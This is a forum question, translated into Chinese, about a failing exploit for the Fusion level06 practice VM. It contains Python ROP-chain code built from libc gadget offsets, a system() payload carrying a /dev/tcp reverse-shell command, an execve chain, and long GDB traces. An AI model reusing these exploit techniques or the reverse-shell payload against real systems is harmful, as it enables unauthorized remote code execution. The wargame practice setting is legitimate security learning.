c - 利用练习融合级别06,系统命令未打开反向shell?
问题描述
我正在尝试利用练习 level06,现在我真的很困惑。
我的漏洞利用脚本成功地泄露了正确的 libc 地址。甚至,使用正确的参数调用 __libc_system 命令,但仍然没有任何事情发生。
__libc_system 函数中的断点
Breakpoint 4, __libc_system (line=0xb7718100 "/bin/sh > /dev/tcp/127.0.0.1/1337 0>&1 2>&1 ")
at ../sysdeps/posix/system.c:179
179 ../sysdeps/posix/system.c: No such file or directory.
in ../sysdeps/posix/system.c
因此,根据上述 gdb 输出,我的漏洞正在调用 __libc_system 并传递写入参数。但是,什么都没有。(注意:线程也不会退出或终止。什么都没有,只是在等待)
一段有效载荷代码
def writethroughpayload(libc, base, data):
data = re.findall('....', data)
gt = libc + 0x000e0097 # pop %ecx | pop %ebx | ret
gt2 = libc + 0x000238df # pop %eax | ret
gt3 = libc + 0x0006cc5a # mov %eax,(%ecx) | ret
p = ''
for n, i in enumerate(data):
print '[+] Number {} Data {}'.format(n*4, i)
p += pack("<I", gt) # pop %ecx | pop %ebx | ret
p += pack("<I", base+(n*4)) # @ .data + 4
p += pack("<I", 0x42424242) # padding
p += pack("<I", gt2) # pop %eax | ret
p += i
p += pack("<I", gt3) # mov %eax,(%ecx) | ret
p += pack("<I", libc + 0x000328e0) # xor %eax,%eax | ret
return p
# Open bind shell : port 1337
def openncshell(libcbase):
data = 0x176000 + 0x2000+ 0x1000+0x100
# Because Of Some Error. Here, I am print every single payload bytes
p = writethroughpayload(libcbase, libcbase+data, CMD)
p += pack("<I", libcbase + 0x000238df) # pop %eax | ret
p += pack("<I", libcbase+data)
p += pack("<I", libcbase + 0x0003cb20) # system()
p += pack("<I", libcbase + 0x000329e0) # exit()
p += pack("<I", libcbase + data)*3 # @ .data
p += '\xcc'*12
return p
def exploit(libc):
# Payload
# EIP = 60
# EDI = 52
# ESI = 48
# EBP = 56
# EBX = 44
payload = 'N'*28 # Paddings
payload += pack('I', libc+0x17600+0x3000+0x150)
payload += 'N'*12
payload += 'JJJJ' # EBX
payload += 'KKKK' # ESI
payload += 'LLLL' # EDI
payload += 'MMMM' # EBP
payload += pack("I", libc + 0x000e0097) # EIP = pop %ecx | pop %ebx | ret)
#payload += openncshell(libc) # EIP
# Got Control Over
# EAX = EAX -
# EDX = 64 Offset
# ESI = 64 Offset
# mov eax,DWORD PTR [esi+0x55c]
payload += struct.pack('I', (libc + 0x0003cb20)-0x55c) # 64 System
payload += 'BBBB'
payload += openncshell(libc)
return payload
GDB 输出
(gdb) shell
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# /opt/fusion/bin/level06
root@fusion:~# netstat -p -l | grep level06
tcp 0 0 *:20006 *:* LISTEN 4608/level06
root@fusion:~# exit
exit
(gdb) attach 4608
Attaching to program: /opt/fusion/bin/level06, process 4608
Reading symbols from /usr/lib/libHX.so.27...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libHX.so.27
Reading symbols from /usr/lib/i386-linux-gnu/libgnutls.so.26...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/i386-linux-gnu/libgnutls.so.26
Reading symbols from /lib/i386-linux-gnu/libpthread.so.0...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libpthread-2.13.so...done.
[Thread debugging using libthread_db enabled]
done.
Loaded symbols for /lib/i386-linux-gnu/libpthread.so.0
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/i386-linux-gnu/libgcrypt.so.11...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgcrypt.so.11
Reading symbols from /lib/i386-linux-gnu/libdl.so.2...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libdl-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libdl.so.2
Reading symbols from /usr/lib/i386-linux-gnu/libtasn1.so.3...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/i386-linux-gnu/libtasn1.so.3
Reading symbols from /lib/i386-linux-gnu/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libz.so.1
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/i386-linux-gnu/libgpg-error.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgpg-error.so.0
eax 0xfffffe00 -512
ecx 0xbfd68200 -1076461056
edx 0xb78293bc -1216179268
ebx 0x5 5
esp 0xbfd681e8 0xbfd681e8
ebp 0xbfd68268 0xbfd68268
esi 0x0 0
edi 0xbfd68234 -1076461004
eip 0xb7804424 0xb7804424 <__kernel_vsyscall+16>
eflags 0x293 [ CF AF SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb7804424 <__kernel_vsyscall+16>: pop ebp
0xb7804425 <__kernel_vsyscall+17>: pop edx
0xb7804426 <__kernel_vsyscall+18>: pop ecx
0xb7804427 <__kernel_vsyscall+19>: ret
0xb7804428: add BYTE PTR [esi],ch
0xb7804424 in __kernel_vsyscall ()
(gdb) b *__libc_system
Breakpoint 4 at 0xb75dbb20: file ../sysdeps/posix/system.c, line 179.
(gdb) c
Continuing.
[New Thread 0xb5ce3b70 (LWP 4629)]
[Switching to Thread 0xb5ce3b70 (LWP 4629)]
eax 0xb7718100 -1217298176
ecx 0xb7718128 -1217298136
edx 0xb75db5c4 -1218595388
ebx 0x42424242 1111638594
esp 0xb5ce325c 0xb5ce325c
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x4b4b4b4b 1263225675
edi 0x4c4c4c4c 1280068684
eip 0xb75dbb20 0xb75dbb20 <__libc_system>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb75dbb20 <__libc_system>: sub esp,0x10
0xb75dbb23 <__libc_system+3>: mov DWORD PTR [esp+0x8],esi
0xb75dbb27 <__libc_system+7>: mov esi,DWORD PTR [esp+0x14]
0xb75dbb2b <__libc_system+11>: mov DWORD PTR [esp+0x4],ebx
0xb75dbb2f <__libc_system+15>: call 0xb76acb63 <__i686.get_pc_thunk.bx>
Breakpoint 4, __libc_system (line=0xb7718100 "/bin/sh > /dev/tcp/127.0.0.1/1337 0>&1 2>&1 ")
at ../sysdeps/posix/system.c:179
179 ../sysdeps/posix/system.c: No such file or directory.
in ../sysdeps/posix/system.c
(gdb)
Continuing.
^C
Program received signal SIGINT, Interrupt.
[Switching to Thread 0xb74e7a70 (LWP 4608)]
eax 0xfffffe00 -512
ecx 0xbfd68200 -1076461056
edx 0xb78293bc -1216179268
ebx 0x5 5
esp 0xbfd681e8 0xbfd681e8
ebp 0xbfd68268 0xbfd68268
esi 0x0 0
edi 0xbfd68234 -1076461004
eip 0xb7804424 0xb7804424 <__kernel_vsyscall+16>
eflags 0x293 [ CF AF SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb7804424 <__kernel_vsyscall+16>: pop ebp
0xb7804425 <__kernel_vsyscall+17>: pop edx
0xb7804426 <__kernel_vsyscall+18>: pop ecx
0xb7804427 <__kernel_vsyscall+19>: ret
0xb7804428: add BYTE PTR [esi],ch
在失去希望之后的这种奇怪的情况下。我试图探索每一个指令,最后发现了这个
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0f4 0xb2c7d0f4
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4415 0xb77a4415 <__kernel_vsyscall+1>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4415 <__kernel_vsyscall+1>: push edx
0xb77a4416 <__kernel_vsyscall+2>: push ebp
0xb77a4417 <__kernel_vsyscall+3>: mov ebp,esp
0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a4415 in __kernel_vsyscall ()
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0f0 0xb2c7d0f0
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4416 0xb77a4416 <__kernel_vsyscall+2>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4416 <__kernel_vsyscall+2>: push ebp
0xb77a4417 <__kernel_vsyscall+3>: mov ebp,esp
0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a441c <__kernel_vsyscall+8>: nop
0xb77a4416 in __kernel_vsyscall ()
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0ec 0xb2c7d0ec
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4417 0xb77a4417 <__kernel_vsyscall+3>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4417 <__kernel_vsyscall+3>: mov ebp,esp
0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a441c <__kernel_vsyscall+8>: nop
0xb77a441d <__kernel_vsyscall+9>: nop
0xb77a4417 in __kernel_vsyscall ()
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0ec 0xb2c7d0ec
ebp 0xb2c7d0ec 0xb2c7d0ec
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4419 0xb77a4419 <__kernel_vsyscall+5>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a441c <__kernel_vsyscall+8>: nop
0xb77a441d <__kernel_vsyscall+9>: nop
0xb77a441e <__kernel_vsyscall+10>: nop
0xb77a4419 in __kernel_vsyscall ()
简单来说,程序自动卡在内核系统调用指令中。
请检查下面提供的 Pastebin 链接并向下滚动到最后。
**
另一个尝试。
**
开发
def writethroughpayload(libc, base, data):
data = re.findall('....', data)
gt = libc + 0x000e0097 # pop %ecx | pop %ebx | ret
gt2 = libc + 0x000238df # pop %eax | ret
gt3 = libc + 0x0006cc5a # mov %eax,(%ecx) | ret
p = ''
for n, i in enumerate(data):
print '[+] Number {} Data {}'.format(n*4, i)
p += pack("<I", gt) # pop %ecx | pop %ebx | ret
p += pack("<I", base+(n*4)) # @ .data + 4
p += pack("<I", 0x42424242) # padding
p += pack("<I", gt2) # pop %eax | ret
p += i
p += pack("<I", gt3) # mov %eax,(%ecx) | ret
p += pack("<I", libc + 0x000328e0) # xor %eax,%eax | ret
p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
p += pack("<I", libc + 0x0006cc5a) # mov %eax,(%ecx) | ret
return p
# Open bind shell : port 1337
def openncshell(libcbase):
data = 0x176000 + 0x2000 +0x1000+20
data2 = data + 0x50
# Because Of Some Error. Here, I am print every single payload bytes
p = writethroughpayload(libcbase, libcbase+data, '/tmp/hackingworks ') # command
p += writethroughpayload(libcbase, libcbase+data2, '/bin/touch ') # name
# EBX = filename
p += pack('<I', libcbase +0x00018f4e) # pop ebx ; ret
p += pack('<I', libcbase +data2) #--> Filename
# ECX = Argv EDX = NULL
p += pack('<I', libcbase +0x2da2b) # pop ecx ; pop edx ; ret
p += pack('<I', libcbase +data) # argv
p += pack('<I', libcbase +data+20) # NULL
# EAX = 11 + kernel call done
p += pack('<I', libcbase +0x0002eb8f) # xor eax, eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
p += pack('<I', libcbase +0x00026722) # inc eax ; ret
#p += '\xcc'*4
p += pack('<I', libcbase +0x0002dd35) # int 0x80
print '[+] Want To Check Syscall. Set breakpoint here : ', hex(libcbase +0x0002dd35)
return p
更准确的 GDB 输出
root@fusion:~# netstat -p -l | grep level06
tcp 0 0 *:20006 *:* LISTEN 3401/level06
root@fusion:~# exit
exit
(gdb) attach 3401
A program is being debugged already. Kill it? (y or n) y
--Skip--
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/i386-linux-gnu/libgpg-error.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgpg-error.so.0
eax 0xfffffe00 -512
ecx 0xbfdd9a50 -1075996080
edx 0xb778f3bc -1216810052
ebx 0x5 5
esp 0xbfdd9a38 0xbfdd9a38
ebp 0xbfdd9ab8 0xbfdd9ab8
esi 0x0 0
edi 0xbfdd9a84 -1075996028
eip 0xb776a424 0xb776a424 <__kernel_vsyscall+16>
eflags 0x293 [ CF AF SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb776a424 <__kernel_vsyscall+16>: pop ebp
0xb776a425 <__kernel_vsyscall+17>: pop edx
0xb776a426 <__kernel_vsyscall+18>: pop ecx
0xb776a427 <__kernel_vsyscall+19>: ret
0xb776a428: add BYTE PTR [esi],ch
0xb776a424 in __kernel_vsyscall ()
(gdb) b *0xb7532d35
Breakpoint 9 at 0xb7532d35
(gdb) c
Continuing.
[New Thread 0xb5c49b70 (LWP 3416)]
[Switching to Thread 0xb5c49b70 (LWP 3416)]
eax 0xb 11
ecx 0xb767e014 -1217929196
edx 0xb767e028 -1217929176
ebx 0xb767e064 -1217929116
esp 0xb5c49250 0xb5c49250
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x4b4b4b4b 1263225675
edi 0x4c4c4c4c 1280068684
eip 0xb7532d35 0xb7532d35 <__restore_rt+5>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb7532d35 <__restore_rt+5>: int 0x80
0xb7532d37 <__restore_rt+7>: nop
0xb7532d38 <__restore>: pop eax
0xb7532d39 <__restore+1>: mov eax,0x77
0xb7532d3e <__restore+6>: int 0x80
Breakpoint 9, <signal handler called>
(gdb) si
Couldn't recognize signal trampoline.
(gdb) c
Continuing.
Cannot find user-level thread for LWP 3416: generic error
(gdb)
解决方案
推荐阅读
- mysql - Docker 设置 mysql 数据库
- python - Python根据maxchars字符串长度边界返回要打印的切片列表
- postgresql - 使用行级安全性 (RLS) 时如何使 INSERT ... RETURNING 语句起作用?
- python-3.x - 导入失败并出现 KeyError: 'id'
- typescript - 为什么 prettier 要在我的 IIAFE 前加上“;”?
- javascript - 我如何摆脱这个数组中的逗号?
- mysql - Mysql:从另一个表更新表的所有列
- flutter - Flutter 如何在这个框架中构建自己的滚动物理?
- regex - 正则表达式:用“@”替换“@@”,用一些字符串替换“@”
- r - 如何在 R 中表示两个定量变量并根据分类变量为图着色?